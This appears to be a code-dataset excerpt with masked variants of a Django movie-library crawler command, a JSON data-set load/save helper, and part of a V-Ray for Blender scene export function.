movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n 
Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n <function token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n <function token>\n <function token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n <function token>\n <function token>\n <function token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n <function token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n <function token>\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n <function token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n <function token>\n <function token>\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n <function token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Command(BaseCommand):\n <assignment token>\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Command(BaseCommand):\n <assignment token>\n <function token>\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n"
] | false |
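The crawler record that ends above repeats the same lifecycle in every variant: build a fresh event loop, an aiohttp.TCPConnector with a connection limit, and a ClientSession; queue tasks; run them with asyncio.wait; then close the session and the loop. Below is a minimal, self-contained sketch of that pattern on its own, outside the Django command; the fetch coroutine, the URL list and the limit of 10 are illustrative placeholders, not taken from the record (whose tasks resolve movie files through its ResolverSet instead).

import asyncio
import aiohttp

async def fetch(session, url):
    # Placeholder task body; the record's tasks resolve movie metadata instead.
    async with session.get(url) as resp:
        return await resp.text()

def crawl(urls):
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    # loop= mirrors the record's calls; recent aiohttp releases infer the loop instead.
    connector = aiohttp.TCPConnector(limit=10, force_close=True, loop=loop)
    session = aiohttp.ClientSession(loop=loop, connector=connector)
    tasks = [asyncio.ensure_future(fetch(session, u)) for u in urls]
    if tasks:
        # asyncio.wait() rejects an empty set, hence the guard above.
        loop.run_until_complete(asyncio.wait(tasks))
    loop.run_until_complete(session.close())  # ClientSession.close() is a coroutine
    loop.close()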
99,820 | 7943f4c2e30820ae53f1f4c36473ad5497bd09c6 | """Provide a method of accessing data from the data sets
This should deal with issues such as relative file paths breaking and
define the most up to date data set to run tests on
"""
import json
from os import path
DNAME = path.dirname(path.abspath(__file__))
DATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, "data_set")
LATEST = "items-7_17_1-en_US_pretty.json"
LATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)
def load_data(filepath=None):
"""Load the items from a json file into a dict"""
if filepath is None:
filepath = LATEST_DATA_SET_PATH
with open(filepath) as file:
return json.load(file)
def save_data(data_set, filepath, pretty=False):
"""Save the data set.
If pretty is specified, make the file human readable."""
with open(filepath, "w") as file:
if pretty:
file.write(
json.dumps(data_set, indent=4, sort_keys=True))
else:
file.write(
json.dumps(data_set, separators=(',', ':'), sort_keys=True))
| [
"\"\"\"Provide a method of accessing data from the data sets\r\n\r\nThis should deal with issues such as relative file paths breaking and\r\ndefine the most up to date data set to run tests on\r\n\r\n\"\"\"\r\nimport json\r\n\r\nfrom os import path\r\n\r\n\r\nDNAME = path.dirname(path.abspath(__file__))\r\nDATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, \"data_set\")\r\n\r\nLATEST = \"items-7_17_1-en_US_pretty.json\"\r\nLATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)\r\n\r\n\r\ndef load_data(filepath=None):\r\n \"\"\"Load the items from a json file into a dict\"\"\"\r\n if filepath is None:\r\n filepath = LATEST_DATA_SET_PATH\r\n\r\n with open(filepath) as file:\r\n return json.load(file)\r\n\r\n\r\ndef save_data(data_set, filepath, pretty=False):\r\n \"\"\"Save the data set.\r\n \r\n If pretty is specified, make the file human readable.\"\"\"\r\n with open(filepath, \"w\") as file:\r\n if pretty:\r\n file.write(\r\n json.dumps(data_set, indent=4, sort_keys=True))\r\n else:\r\n file.write(\r\n json.dumps(data_set, separators=(',', ':'), sort_keys=True))\r\n",
"<docstring token>\nimport json\nfrom os import path\nDNAME = path.dirname(path.abspath(__file__))\nDATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, 'data_set')\nLATEST = 'items-7_17_1-en_US_pretty.json'\nLATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\ndef save_data(data_set, filepath, pretty=False):\n \"\"\"Save the data set.\n \n If pretty is specified, make the file human readable.\"\"\"\n with open(filepath, 'w') as file:\n if pretty:\n file.write(json.dumps(data_set, indent=4, sort_keys=True))\n else:\n file.write(json.dumps(data_set, separators=(',', ':'),\n sort_keys=True))\n",
"<docstring token>\n<import token>\nDNAME = path.dirname(path.abspath(__file__))\nDATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, 'data_set')\nLATEST = 'items-7_17_1-en_US_pretty.json'\nLATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\ndef save_data(data_set, filepath, pretty=False):\n \"\"\"Save the data set.\n \n If pretty is specified, make the file human readable.\"\"\"\n with open(filepath, 'w') as file:\n if pretty:\n file.write(json.dumps(data_set, indent=4, sort_keys=True))\n else:\n file.write(json.dumps(data_set, separators=(',', ':'),\n sort_keys=True))\n",
"<docstring token>\n<import token>\n<assignment token>\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\ndef save_data(data_set, filepath, pretty=False):\n \"\"\"Save the data set.\n \n If pretty is specified, make the file human readable.\"\"\"\n with open(filepath, 'w') as file:\n if pretty:\n file.write(json.dumps(data_set, indent=4, sort_keys=True))\n else:\n file.write(json.dumps(data_set, separators=(',', ':'),\n sort_keys=True))\n",
"<docstring token>\n<import token>\n<assignment token>\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\n<function token>\n",
"<docstring token>\n<import token>\n<assignment token>\n<function token>\n<function token>\n"
] | false |
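Record 99,820 above is a small I/O helper; a round trip through it looks like the sketch below. The module name data_set_io and the output filename are assumptions made for the example, not part of the record.

# Hypothetical usage of load_data()/save_data() from record 99,820,
# assuming its file is importable as data_set_io.
import data_set_io

items = data_set_io.load_data()  # no argument -> falls back to LATEST_DATA_SET_PATH
print(len(items), 'top-level entries in', data_set_io.LATEST)
data_set_io.save_data(items, 'items_compact.json', pretty=False)  # compact separators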
99,821 | 55b1113b643adcc6cf6fb3c2702490b105c3703c | #
# V-Ray For Blender
#
# http://chaosgroup.com
#
# Author: Andrei Izrantcev
# E-Mail: [email protected]
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# All Rights Reserved. V-Ray(R) is a registered trademark of Chaos Software.
#
import os
import time
import datetime
import bpy
from vb30.lib.VRayStream import VRayExportFiles
from vb30.lib.VRayStream import VRayPluginExporter
from vb30.lib.VRayStream import VRayFilePaths
from vb30.lib import SysUtils, BlenderUtils
from vb30.nodes import export as NodesExport
from vb30.exporting import exp_init
from vb30.exporting import exp_settings
from vb30.exporting import exp_channels
from vb30.exporting import exp_frame
from vb30.exporting import exp_run
from vb30.exporting import exp_anim_full
from vb30.exporting import exp_anim_camera_loop
from vb30 import debug
HAS_VB35 = SysUtils.hasRtExporter()
if HAS_VB35:
import _vray_for_blender_rt
@debug.TimeIt
def Export(bus, scene, engine, isPreview=False):
o = bus['output']
VRayScene = scene.vray
VRayExporter = VRayScene.Exporter
ts = time.time()
o.write('MAIN', "\n")
o.write('MAIN', SysUtils.GetVRsceneTemplate("defaults.vrscene"))
if VRayExporter.draft:
o.write('MAIN', "\n")
o.write('MAIN', SysUtils.GetVRsceneTemplate("draft.vrscene"))
exp_channels.ExportRenderElements(bus)
if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:
err = exp_frame.ExportSingleFrame(bus)
elif VRayExporter.animation_mode == 'CAMERA_LOOP':
err = exp_anim_camera_loop.ExportCameraLoop(bus)
else:
err = exp_anim_full.ExportAnimation(bus,
scene.frame_start,
scene.frame_end,
scene.frame_step
)
    if VRayScene.Includer.use:
        o.write('MAIN', "\n// Include additional *.vrscene files")
        for includeFile in VRayScene.Includer.nodes:
            if not includeFile.use:
                continue
            filepath = BlenderUtils.GetFullFilepath(includeFile.scene)
            o.write('MAIN', '\n#include "%s" // %s' % (filepath, includeFile.name))
        o.write('MAIN', '\n')
# No need for interpolate() anymore
o.setAnimation(False)
exp_settings.ExportSettings(bus)
te = time.time() - ts
td = datetime.timedelta(seconds=te)
d = datetime.datetime(1,1,1) + td
if not bus['preview']:
debug.PrintMsg("Export done [%.2i:%.2i:%.2i]" % (d.hour, d.minute, d.second))
return err
def ExportEx(bus):
debug.Debug("ExportEx()")
err = None
scene = bus['scene']
engine = bus['engine']
o = bus['output']
VRayScene = scene.vray
VRayExporter = VRayScene.Exporter
pm = VRayFilePaths()
# Setting user defined value here
    # It could be overridden in 'initFromScene'
# depending on VRayDR settings
pm.setSeparateFiles(VRayExporter.useSeparateFiles)
pm.initFromScene(engine, scene)
pm.printInfo()
fm = VRayExportFiles(pm)
